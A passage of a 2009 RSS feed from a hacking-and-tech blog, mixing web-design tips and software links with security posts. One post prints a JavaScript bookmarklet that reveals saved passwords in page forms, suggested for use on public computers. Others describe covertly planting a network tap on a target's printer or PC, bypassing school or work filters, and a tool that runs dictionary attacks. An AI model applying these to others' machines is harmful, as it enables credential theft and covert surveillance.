<p>Reese Spykerman, owner of <a href="http://www.designbyreese.com/" target="_blank">Design by Reese</a>, says she often begins by explaining the difference between a domain name, a web host, and a website.</p>
<p>A domain name is a site&#8217;s web address&#8211;yoursite.com, for instance. These addresses are rented on a yearly basis from online registrars. A web host, on the other hand, provides server space&#8211;the virtual home where the site will live. Finally, there is the website itself&#8211;the collection of files that contain the actual design, text and media.</p>
<p>If all of that is unfamiliar, don&#8217;t worry; Spykerman says designers are happy to recommend reliable domain registrars and hosting companies when they work with clients.</p>
<p><strong>3. Be prepared to collaborate</strong><br />
Once you&#8217;re ready to approach a designer, your input is key. Young says many people don&#8217;t realize how much direction they&#8217;ll need to provide in order to give their designer a successful starting point.</p>
<p>&#8220;The fantasy people have a lot of times is that they&#8217;re just simply going to be able to call a web designer and say, &#8216;Make me a website and show it to me in two weeks when it&#8217;s all done,&#8217;&#8221; he says.</p>
<p>The reality, Young says, is that the process is a collaboration&#8211;from start to finish. In the beginning, designers typically ask for detailed descriptions of what prospective clients needs from their websites, as well as for links to other sites that the clients admire. If a designer provides an online questionnaire, potential clients should answer it as thoroughly as possible, he says.</p>
<p><strong>4. Get comfortable</strong><br />
Because collaboration is so important, a shared aesthetic isn&#8217;t enough&#8211;personalities matter, too. Once prospective clients have completed her online questionnaire, Reeder recommends a brief telephone call to determine whether they&#8217;re a good fit.</p>
<p>&#8220;It builds a rapport, and it lets us listen to the client and really hear what they want. &#8230; That first 20- or 30-minute phone call right at the beginning is really important to set the tone for your project,&#8221; she says.</p>
<p>Spykerman says clients should also take care that a designer doesn&#8217;t seem too eager or hurried. Reputable designers tend to be selective in whom they work with, because they understand how important a good match is to a project&#8217;s success. She recommends contacting a designer&#8217;s previous clients to ask about their experiences.</p>
<p><strong>5. Know what you&#8217;re paying for<br />
</strong>Once the match is made, a contract is the next step. And here clients can&#8217;t be too careful, Reeder says. Everything that&#8217;s meant to be included in the project&#8211;from the payment schedule to the number of revisions that a client is allowed to request&#8211;should be spelled out. While some designers are flexible about small changes, clients shouldn&#8217;t count on it.</p>
<p>&#8220;Read it thoroughly, because anything that is not in that document is going to cost you extra,&#8221; she says.</p>
<p>Clients should also be prepared to put down a deposit before any work begins, she says.</p>
<p><strong>6. Be honest, but don&#8217;t nitpick</strong><br />
Generally, designers provide clients with a mockup of a proposed design before transforming it into a working site, and this can be the most delicate part of the collaboration. Reeder, Young and Spykerman were all adamant that clients should be honest if they want to see a different design, but they were equally adamant that wholesale revisions are usually better than a lot of small changes.</p>
<p>&#8220;If you feel like the design is way off the mark and it doesn&#8217;t feel right for your business, speak up,&#8221; Spykerman says. &#8220;At the same time, understand that requests like &#8216;put more space on the left and right, and add these 10 things to the sidebar&#8217; may leave you with a design that resembles Frankenstein.&#8221;</p>
<p><strong>7. Hold up your end<br />
</strong>While the designer provides a site&#8217;s visual and technical framework, the client is usually responsible for providing the site&#8217;s content&#8211;most commonly the text. Failing to do so on time can delay completion of the project, sometimes drastically so.</p>
<p>If the text isn&#8217;t already prepared, Young recommends that clients consider hiring a professional copywriter. Aside from taking the burden off the business owner, a copywriter can provide text that&#8217;s customized for search engines, which will help potential customers find the site when it&#8217;s finished.</p>
<p><strong>8. Be decisive<br />
</strong>Content aside, the most common cause of delays or extra costs after the contract is signed are sudden changes or additions, Reeder says. Many people don&#8217;t understand how long certain changes will take to implement, so they&#8217;re quick to call and ask for what she calls the &#8220;just-dos.&#8221; Spykerman says such misunderstandings are another example of the importance of establishing a good relationship between designer and client.</p>
<p>&#8220;A good relationship established before contracts are signed often helps ensure these issues are handled professionally and calmly on both ends,&#8221; she says.</p>
<p>Young says the key is to do the necessary preparation when making your decisions&#8211;and then to stick by those decisions until the project is complete.</p>
<p> </p>
<p>So give us a call whenever you need a website designed by visiting www.cyberphunkz.com or sending a mail to milind@cyberphunkz.in</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/05/15/8-tips-for-working-with-web-designers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PDF Watermark Creator 1.0 (Windows)</title>
		<link>http://techblog.cyberphunkz.com/2009/05/15/pdf-watermark-creator-10-windows/</link>
		<comments>http://techblog.cyberphunkz.com/2009/05/15/pdf-watermark-creator-10-windows/#comments</comments>
		<pubDate>Fri, 15 May 2009 08:25:27 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[pdf]]></category>
		<category><![CDATA[watermark]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=242</guid>
		<description><![CDATA[Add a watermark (texts such as DRAFT, CONFIDENTIAL, or even your company&#8217;s name) to PDF files quickly and easily. To stamp a watermark on your PDF files is to mark you PDF documents as your copyrighted property. The watermark can be stamped behind virtually every elements of a PDF file. You can choose whether to &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/05/15/pdf-watermark-creator-10-windows/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Add a watermark (texts such as DRAFT, CONFIDENTIAL, or even your company&#8217;s name) to PDF files quickly and easily. To stamp a watermark on your PDF files is to mark you PDF documents as your copyrighted property. The watermark can be stamped behind virtually every elements of a PDF file. You can choose whether to overwrite the existing text of a PDF file when the watermark is created. With this freeware utility, you can number the pages of existing PDF files or add you company text logo or your copyright message.</p>
<p><a href="http://techblog.cyberphunkz.com/post_data/pdfmark.exe" target="_self">Download</a></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/05/15/pdf-watermark-creator-10-windows/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>See Beyond The Asterisks</title>
		<link>http://techblog.cyberphunkz.com/2009/05/10/see-beyond-the-asterisks/</link>
		<comments>http://techblog.cyberphunkz.com/2009/05/10/see-beyond-the-asterisks/#comments</comments>
		<pubDate>Sun, 10 May 2009 15:44:56 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[tips]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=220</guid>
		<description><![CDATA[Forget your password but it is saved on Firefox? Or just saw a password stored in Firefox in a public computer? You can see it now. Actually, theres two ways to do that. One is to go to Tools &#62; Options and then on Security tab click on Show Passwords. Again Clicking on Show Password will reveal all &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/05/10/see-beyond-the-asterisks/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Forget your password but it is saved on Firefox? Or just saw a password stored in Firefox in a public <span style="color: orange;"><span class="kLink"><span style="color: #000000;">computer</span></span></span>?<br />
You can see it now. Actually, theres two ways to do that.<br />
One is to go to Tools &gt; Options and then on <span style="color: orange;"><span class="kLink"><span style="color: #000000;">Security</span></span></span> tab click on Show Passwords. Again Clicking on Show Password will reveal all the passwords stored on firefox site by site.</p>
<p>But, there is another exciting way to do that. If you see a password form filled up, just copy and paste this piece of javascript code in your address bar and hit enter. A Popup will then come up showing the passwords.</p>
<blockquote><p><em><strong>javascript:%20var%20p=r();%20function%20r(){var%20g=0;var%20x=false;var%20x=z<br />
(document.forms);g=g+1;var%20w=window.frames;for(var%20k=0;k&lt;w.length;<br />
k++)%20{var%20x%20=%20((x)%20||%20(z(w[k].document.forms)));g=g+1;}if<br />
%20(!x)%20alert(’Password%20not%20found%20in%20?%20+%20g%20+%20?%20<br />
forms’);}function%20z(f){var%20b=false;for(var%20i=0;i&lt;f.length;i++)%20{var<br />
%20e=f[i].elements;for(var%20j=0;j&lt;e.length;j++)%20{if%20(h(e[j]))%20{b=true}<br />
}}return%20b;}function%20h(ej){var%20s=”;if%20(ej.type==’password’){s=ej.value;<br />
if%20(s!=”){prompt(’Password%20found%20?,%20s)}else{alert(’Password%20is%20<br />
blank’)}return%20true;}}</strong></em></p></blockquote>
<p>Check it and let us know here what you found <img class="wp-smiley" src="http://www.tech-freek.com/wp-includes/images/smilies/icon_smile.gif" alt=":)" /></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/05/10/see-beyond-the-asterisks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hide My Ass &#8211; An anonymous web surfing and proxy tool</title>
		<link>http://techblog.cyberphunkz.com/2009/05/10/hide-my-ass-an-anonymous-web-surfing-and-proxy-tool/</link>
		<comments>http://techblog.cyberphunkz.com/2009/05/10/hide-my-ass-an-anonymous-web-surfing-and-proxy-tool/#comments</comments>
		<pubDate>Sun, 10 May 2009 14:15:09 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[prox]]></category>
		<category><![CDATA[surfing]]></category>
		<category><![CDATA[tool]]></category>
		<category><![CDATA[web]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=204</guid>
		<description><![CDATA[Hide My Ass! helps hundreds of thousands of people daily by protecting their privacy and identity online. They offer a range of unique services, from our web proxy enabling you to surf the web anonymously to our free file hosting with advanced privacy features. Please see below for a short list of their features:   &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/05/10/hide-my-ass-an-anonymous-web-surfing-and-proxy-tool/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>Hide My Ass! helps hundreds of thousands of people daily by protecting their privacy and identity online. They offer a range of unique services, from our web proxy enabling you to surf the web anonymously to our free file hosting with advanced privacy features. Please see below for a short list of their features:</p>
<p> </p>
<div class="serviceslist"><a title="Surf the web anonymously with ease" href="http://www.hidemyass.com/proxy/"><img class="alignleft" src="http://www.hidemyass.com/images/web-proxy-service.png" alt="Free web proxy image" width="102" height="102" /></a> </p>
<h2><a title="Surf the web anonymously with ease" href="http://www.hidemyass.com/proxy/">Free Web Proxy</a></h2>
<p>The best free proxy on the web. Become anonymous online with just one mouse click; our free proxy works within your web browser and hides your IP address (online &#8216;fingerprint&#8217;) for every website you visit. Hide behind our IP address, access blocked websites, encrypt your web history, protect your identity and add another layer of security onto your internet connection simply by using our free proxy.</p></div>
<div class="serviceslist"><a title="Upload files and images with advanced privacy features" href="http://www.hidemyass.com/upload/"><img class="alignleft" src="http://www.hidemyass.com/images/file-hosting-service.png" alt="Free file hosting image" width="102" height="102" /></a> </p>
<h2><a title="Upload files and images with advanced privacy features" href="http://www.hidemyass.com/upload/">Free File and Image Hosting</a></h2>
<p>Upload files or images with advanced privacy features, choose who can and can&#8217;t download your files; restrict by country, continent, password, IP address or range, user-agent and website referrer. Our free file hosting storage is a great way to upload files and share with friends/family/employees securely, unlike generic file hosts in which anyone can download or view your files.</p></div>
<div class="serviceslist"><a title="Receive emails anonymously" href="http://www.hidemyass.com/anonymous-email/"><img class="alignleft" src="http://www.hidemyass.com/images/anonymous-email-service.png" alt="Free email image" width="102" height="102" /></a> </p>
<h2><a title="Receive emails anonymously" href="http://www.hidemyass.com/anonymous-email/">Free Anonymous EMail</a></h2>
<p>Our free anonymous email service is a great way to receive emails anonymously, without revealing your indentity. Perfect for those websites you just don&#8217;t trust giving your real email address to and to help stay away from SPAM messages. Signup takes less than one minute and you even have the option to delete your account at any time. Once you have signed up, direct all emails to your specific email address and they will be received instantly.</p>
<p>For more details, please visit: <a href="http://www.hidemyass.com">http://www.hidemyass.com</a></div>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/05/10/hide-my-ass-an-anonymous-web-surfing-and-proxy-tool/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Make your WordPress Blog Secure/ HackerSafe</title>
		<link>http://techblog.cyberphunkz.com/2009/05/04/make-your-wordpress-blog-secure-hackersafe/</link>
		<comments>http://techblog.cyberphunkz.com/2009/05/04/make-your-wordpress-blog-secure-hackersafe/#comments</comments>
		<pubDate>Mon, 04 May 2009 05:54:56 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[hacking]]></category>
		<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[hackersafe]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=144</guid>
		<description><![CDATA[You’ve made a nice blog with a good design. Getting lots of traffic, huh? Now, consider getting it hacked. Isn’t it unfair? So, follow the steps to make your blog secure and hackerSAFE STEP 1 Update Update Update! Tip: Use the latest version of the WordPress! Its always better as they fix up the Vulnerabilities and &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/05/04/make-your-wordpress-blog-secure-hackersafe/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>You’ve made a nice blog with a good design. Getting lots of traffic, huh? Now, consider getting it hacked. Isn’t it unfair? So, follow the steps to make your blog secure and hackerSAFE</p>
<h3>STEP 1</h3>
<h3>Update Update Update!</h3>
<p><strong>Tip: </strong>Use the latest version of the WordPress! Its always better as they fix up the Vulnerabilities and make it more safe.</p>
<p><strong>How to: </strong>As soon as the new version is available, you’ll be notified on your WordPress Admin Dashboard. Follow the process form there to update it.</p>
<h3>STEP 2</h3>
<h3>Change Username and Password!</h3>
<p><strong>Tip:</strong> Wordpress provides you the default username and password i.e admin at the time of install so everyone will know your username so and its it would be easy for them to guess your password.</p>
<p><strong>How to:</strong> Create a new user from the dashboard and keep an alpha numerical password even include special characters.And then sign in to phpMyAdmin through your webserver account and change user name from “admin” to something of your choice too.</p>
<h3>STEP 3</h3>
<h3>Keep Backups</h3>
<p><strong>Tip:</strong> Its always good to keep a backup of your blog posts and comments, so that you can revert to the latest contents after a disaster. I suggest you backup often, depending upon your site’s traffic.</p>
<p><strong>How to:</strong>There is a WordPress backup plugin which does a pretty job. You can either email the backup or download it to your computer. Link to plugin <a rel="nofollow" href="http://wordpress.org/extend/plugins/wp-db-backup/" target="_blank">here</a></p>
<p>Manual backup is even better to do a complete backup of your database.</p>
<h3>STEP 4</h3>
<h3>Stop brute force attacks</h3>
<p><strong>Tip: </strong>Brute force is multiple attempt of logins. You can stop it!</p>
<p><strong>How to:</strong> Use login lockdown plugin, its and excellent plugin which monitors login attempts to your site. It checks how many times in a short period of time the same IP range has tried to login and if in that time a particular IP exceeds the attempts allowed then this sweet plugin will lock down access privileges for a time period you set.</p>
<p>Download<a href="http://www.bad-neighborhood.com/login-lockdown.html" target="_blank"> here</a></p>
<h3>STEP 5</h3>
<h3>Password protect</h3>
<p><strong>Tip</strong>: Password protect you wp-admin</p>
<p><strong>How to: </strong>Use the askapache password protect plugin It protects your WordPress wp-admin folder which adds another layer of security by requiring a set of valid Username and Password to gain access to anything in the /wp-admin/ folder.</p>
<p>Easy to use, all you need to do is to create another username and password. Here, you added some more protection. It works by writing a new .htaccess file for that folder, and encrypts your new password. Highly recommended.</p>
<p>Download plugin from <a href="http://wordpress.org/extend/plugins/askapache-password-protect/" target="_blank">here</a></p>
<h3>STEP 6</h3>
<h3>Hide Your Contents</h3>
<p><strong>Tip:</strong> Did you ever login http://www.yourdomain.com/wp-contents/plugins/ on your browser? Do it! You will see the list of  your plugins now its again cake walk for the hackers to look at your plugin and see if you are using one with known security vulnerabilities and exploit them. So hide it</p>
<p><strong>How to:</strong> Just make a blank index.html on your computer, upload it using the your ftp and put it in the /plugins/ folder and its all fixed. Its also good to add it in your /themes/ folder too. It works!</p>
<h3>STEP 7</h3>
<h3>Block search engines</h3>
<p><strong>Tip:</strong> Block search engines from crawling up your wp-folders as there is no need to have all your WordPress files indexed, so its probably better to block them so there is no need to having all your WordPress files indexed, so its probably better to block them so when people search they do not see those files.</p>
<p><strong>How To:</strong> You can block search engines from crawling your wp- folders by blocking access via robots.txt file.</p>
<p>Simply add this line: Disallow: /wp-*</p>
<p>If you are lazy again to do this then go ahead and use KB robots.txt plugin</p>
<p>Download from <a rel="nofollow" href="http://wordpress.org/extend/plugins/kb-robotstxt/" target="_blank">here</a></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/05/04/make-your-wordpress-blog-secure-hackersafe/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to Remove Koobface / Facebook Virus</title>
		<link>http://techblog.cyberphunkz.com/2009/05/04/how-to-remove-koobface-facebook-virus/</link>
		<comments>http://techblog.cyberphunkz.com/2009/05/04/how-to-remove-koobface-facebook-virus/#comments</comments>
		<pubDate>Mon, 04 May 2009 05:51:29 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[How To?]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[koobface]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=142</guid>
		<description><![CDATA[What is Koobface? Koobface is a malicious executable program that is commonly installed without user consent or knowledge. Koobface can be installed by itself or bundled with other infections. Koobface will often display frequent advertisements for bogus products or programs. The presence of Koobface can cause sluggish system performance, system freezes and/or crashes. Eventual system &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/05/04/how-to-remove-koobface-facebook-virus/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p><span>What is Koobface?</span></p>
<p><span>Koobface is a malicious executable program that is commonly installed without user consent or knowledge. Koobface can be installed by itself or bundled with other infections. Koobface will often display frequent advertisements for bogus products or programs. The presence of Koobface can cause sluggish system performance, system freezes and/or crashes. Eventual system failure and blue screen could also be caused by Koobface. Koobface is not known to replicate itself at the time of this publication.How do I remove Koobface?</span></p>
<p><span>This Koobface Removal guide provides two Koobface removal options, automatic Koobface scanner and manual removal. Please see our Koobface manual removal warning before proceeding with manual removal.</span><br />
<span>Automatic Koobface scanner download</span></p>
<p><span><a href="http://www.pctools.com/mirror/sdsetup.exe">Click here</a> to download Automatic Remover</span></p>
<p><span>Manual Koobface removal directions</span></p>
<p><span>Warning! Manual Removal of Koobface is intended to be used by advanced users only.</span></p>
<p><span>Follow directions below for Koobface removal manually:</span><br />
<span>Find and Stop Koobface Virus Processes: ctrl+alt+del -&gt; Processes</span></p>
<p><span>* fbtre6.exe</span><br />
<span>mstre6.exe</span></p>
<p><span>Find and Remove Koobface Virus registry values:</span></p>
<p><span>* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run\”systray” = “c:\windows\mstre6.exe”</span><br />
<span>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run\”systray” = “C:\Windows\fbtre6.exe”</span><br />
<span>HKEY_CURRENT_USER\AppEvents\Schemes\Apps\Explorer\Navigating</span></p>
<p><span>Find and Delete Koobface Virus Files:</span></p>
<p><span>* C:\\Windows\\fbtre6.exe</span><br />
<span>C:\\Windows\\fmark2.dat</span></p>
<p><span>How did I get Koobface?</span></p>
<p><span>Unfortunately it is very difficult to pinpoint the exact distribution point of Koobface. However, common delivery tactics of Koobface could be, but not limited to: trojans, browser exploits, pc ports or other vulnerable access points. We have seen reports of Koobface being distributed through fake media codec downloads as well.</span><br />
<span>Common symptoms of Koobface?</span></p>
<p><span>Possible attributes and symptoms of Koobface are listed below.</span></p>
<p><span>* Koobface may push advertisements for rogue security applications</span><br />
<span>* Koobface may cause frequent popup advertisements</span><br />
<span>* Koobface may cause sluggish system performance</span><br />
<span>* Koobface may cause slow PC processing</span><br />
<span>* Koobface may cause Blue Screen</span><br />
<span>* Koobface may cause high CPU usage</span></p>
<p><span>How do I prevent Koobface?</span></p>
<p><span>Once you have cleaned up Koobface, the main tip in order to prevent Koobface and future malicious programs from returning is to stay suspicious of new websites you have never visited. Chances are you were tricked into downloading Koobface when you thought it was something else.</span></p>
<p><span>More tips to prevent Koobface from returning:</span></p>
<p><span>* Update Windows often</span><br />
<span>* Update Windows Security Settings</span><br />
<span>* Turn on Firewall Protection</span><br />
<span>* Update Anti-Spyware Software Frequently</span></p>
<p><span>What is the purpose of Koobface?</span></p>
<p><span>The creators or authors of Koobface have one sole objective in mind, money. Almost all forms of malicious code nowadays, with Koobface being no exception, are created to make a buck. The creators or authors of Koobface know that if then can distribute “x” amount of downloads of Koobface then Koobface will generate “y” amount of revenue. In addition, many of these Malware authors have been doing this awhile so they have perfected their conversion rates and will continue to do so.</span></p>
<p><span>Who is behind Koobface?</span></p>
<p><span>It is difficult to say exactly who is behind Koobface. Certain hypothesis can be created for Koobface though. Chances are the creators or authors of Koobface are located (or at least their servers are) somewhere in either Eastern Europe or China. However, Malware has been retraced back to almost every country in the world so it really difficult to gauge this with any type of accuracy.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/05/04/how-to-remove-koobface-facebook-virus/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>The Unblock Websites Proxy Program 2.0</title>
		<link>http://techblog.cyberphunkz.com/2009/05/03/the-unblock-websites-proxy-program-20/</link>
		<comments>http://techblog.cyberphunkz.com/2009/05/03/the-unblock-websites-proxy-program-20/#comments</comments>
		<pubDate>Sun, 03 May 2009 17:47:40 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[proxy]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=140</guid>
		<description><![CDATA[Publisher&#8217;s description of The Unblock Websites Proxy Program From Software Marketing Magic:  The Unblock Websites Proxy Program works wonders for unblocking websites that may have been blocked by your work or school. To unblock sites all you need to do type in the address of the site you wish to visit into the box once the &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/05/03/the-unblock-websites-proxy-program-20/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<h2><span>Publisher&#8217;s description of The Unblock Websites Proxy Program</span></h2>
<p><strong>From <a href="http://download.cnet.com/windows/software-marketing-magic/3260-2023_4-6296583.html">Software Marketing Magic</a>:</strong> </p>
<p>The Unblock Websites Proxy Program works wonders for unblocking websites that may have been blocked by your work or school. To unblock sites all you need to do type in the address of the site you wish to visit into the box once the software loads. Our unblock Web sites tool acts as an anonymous proxy server by tricking the firewall into thinking that you are visiting some other unblocked Web site. You are also free to share this with buddies who may have the same need to unblock Web sites, as you do. Many other Web sites offer the service to unblock sites but have either overwhelming ads and pop-ups or adware/spyware. Our program will give you fast speeds and a single completely unobtrusive relevant ad which allows us to support or free software. Download this program now and unblock Web sites previously bared to you. Your frustrations are now over.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ui_features = "rc:0";
google_ad_width = 234;
google_ad_height = 60;
google_ad_format = "234x60_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=234x60";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p><a href="http://dw.com.com/redir?edId=3&amp;siteId=4&amp;oId=3000-2144_4-10792318&amp;ontId=2144_4&amp;spi=317a4c6b6146b0b279b3c79083c28408&amp;lop=link&amp;tag=tdw_dltext&amp;ltype=dl_dlnow&amp;pid=10844467&amp;mfgId=6296583&amp;merId=6296583&amp;pguid=iylVzwoPjAUAADrgSysAAACF&amp;destUrl=http%3A%2F%2Fdownload.cnet.com%2F3001-2144_4-10792318.html%3Fspi%3D317a4c6b6146b0b279b3c79083c28408">Download Now</a> (1.29MB)</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/05/03/the-unblock-websites-proxy-program-20/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Interceptor &#8211; Wireless Wired Network Tap (Fon+)</title>
		<link>http://techblog.cyberphunkz.com/2009/04/27/interceptor-wireless-wired-network-tap-fon/</link>
		<comments>http://techblog.cyberphunkz.com/2009/04/27/interceptor-wireless-wired-network-tap-fon/#comments</comments>
		<pubDate>Mon, 27 Apr 2009 09:29:18 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[fon+]]></category>
		<category><![CDATA[IDS]]></category>
		<category><![CDATA[network hacking]]></category>
		<category><![CDATA[network monitoring]]></category>
		<category><![CDATA[pen testing]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=120</guid>
		<description><![CDATA[The Interceptor is a wireless wired network tap. Basically, a network tap is a way to listen in to network traffic as it flows past. Most tools are designed to pass a copy of the traffic onto a specified wired interface which is then plugged into a machine to allow a user to monitor the &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/04/27/interceptor-wireless-wired-network-tap-fon/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>The Interceptor is a wireless wired network tap. Basically, a network tap is a way to listen in to network traffic as it flows past. Most tools are designed to pass a copy of the traffic onto a specified wired interface which is then plugged into a machine to allow a user to monitor the traffic. The problem with this is that you have to be able to route the data from that wired port to your monitoring machine either through a direct cable or through an existing network. The direct cable method means your monitor has to be near by the location you want to tap, the network routing means you have to somehow encapsulate the data to get it across the network without it being affected on route.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ui_features = "rc:0";
google_ad_width = 234;
google_ad_height = 60;
google_ad_format = "234x60_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=234x60";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p>The Interceptor does away with the wired monitor port and instead spits out the traffic over wireless meaning the listener can be anywhere they can make a wireless connection to the device. As the data is encrypted (actually, double encrypted, see how it works) the person placing the tap doesn’t have to worry about unauthorized users seeing the traffic.</p>
<p><strong>Requirements</strong></p>
<p>This project has been built and tested on a Fon+ but should in theory work on any device which will run OpenWrt and has at least a pair of wired interfaces and a wireless one</p>
<p>This isn’t intended to be a permanent, in-situ device. It is designed for short term trouble shooting or information gathering on low usage networks, as such, it will work well between a printer and a switch but not between a switch and a router. Here are some possible situations for use:</p>
<ul>
<li>Penetration testing &#8211; If you can gain physical access to a targets office drop the device between the office printer and switch then sit in the carpark and collect a copy of all documents printed. Or, get an appointment to see a boss and when he leaves the room to get you a drink, drop it on his computer. The relative low cost of the Fon+ means the device can almost be considered disposable and if branded with the right stickers most users wouldn’t think about an extra small box on the network.</li>
<li>Troubleshooting &#8211; For sys-admins who want to monitor an area of network from the comfort of their desks, just put it in place and fire up your wireless.</li>
<li>IDS &#8211; If you want to see what traffic is being generated from a PC without interfering with the PC simply add the Interceptor and sit back and watch. As the traffic is cloned to a virtual interface on your monitoring machine you can use any existing tools to scan the data.</li>
</ul>
<p>You can download Interceptor here:<br />
<script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ui_features = "rc:0";
google_ad_width = 234;
google_ad_height = 60;
google_ad_format = "234x60_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=234x60";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
google_color_url = "008000";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
<a href="http://www.digininja.org/files/interceptor_1.0.tar.bz2">interceptor_1.0.tar.bz2</a></p>
<p>Or read more <a href="http://www.digininja.org/interceptor/">here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://techblog.cyberphunkz.com/2009/04/27/interceptor-wireless-wired-network-tap-fon/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>OAT (OCS Assessment Tool) &#8211; Office Communication Server Security Assessment Tool</title>
		<link>http://techblog.cyberphunkz.com/2009/04/27/oat-ocs-assessment-tool-office-communication-server-security-assessment-tool/</link>
		<comments>http://techblog.cyberphunkz.com/2009/04/27/oat-ocs-assessment-tool-office-communication-server-security-assessment-tool/#comments</comments>
		<pubDate>Mon, 27 Apr 2009 09:21:43 +0000</pubDate>
		<dc:creator>Freak</dc:creator>
				<category><![CDATA[Common Sense]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[ms office]]></category>
		<category><![CDATA[security tool]]></category>

		<guid isPermaLink="false">http://techblog.cyberphunkz.com/?p=113</guid>
		<description><![CDATA[OAT is an Open Source Security tool designed to check the password strength of Microsoft Office Communication Server users. After a password is compromised, OAT demonstrates potential UC attacks that can be performed by legitimate users if proper security controls are not in place. Features Online Dictionary Attack Presence Stealing Contact List Stealing Single User &#8230; </p><p><a class="more-link block-button" href="http://techblog.cyberphunkz.com/2009/04/27/oat-ocs-assessment-tool-office-communication-server-security-assessment-tool/">Continue reading &#187;</a>]]></description>
			<content:encoded><![CDATA[<p>OAT is an Open Source Security tool designed to check the password strength of Microsoft Office Communication Server users. After a password is compromised, OAT demonstrates potential UC attacks that can be performed by legitimate users if proper security controls are not in place.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-8241851284410172";
google_ui_features = "rc:0";
google_ad_width = 234;
google_ad_height = 60;
google_ad_format = "234x60_as";
google_ad_type = "text_image";
google_alternate_ad_url = "?adsensem-benice=234x60";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_text = "000000";
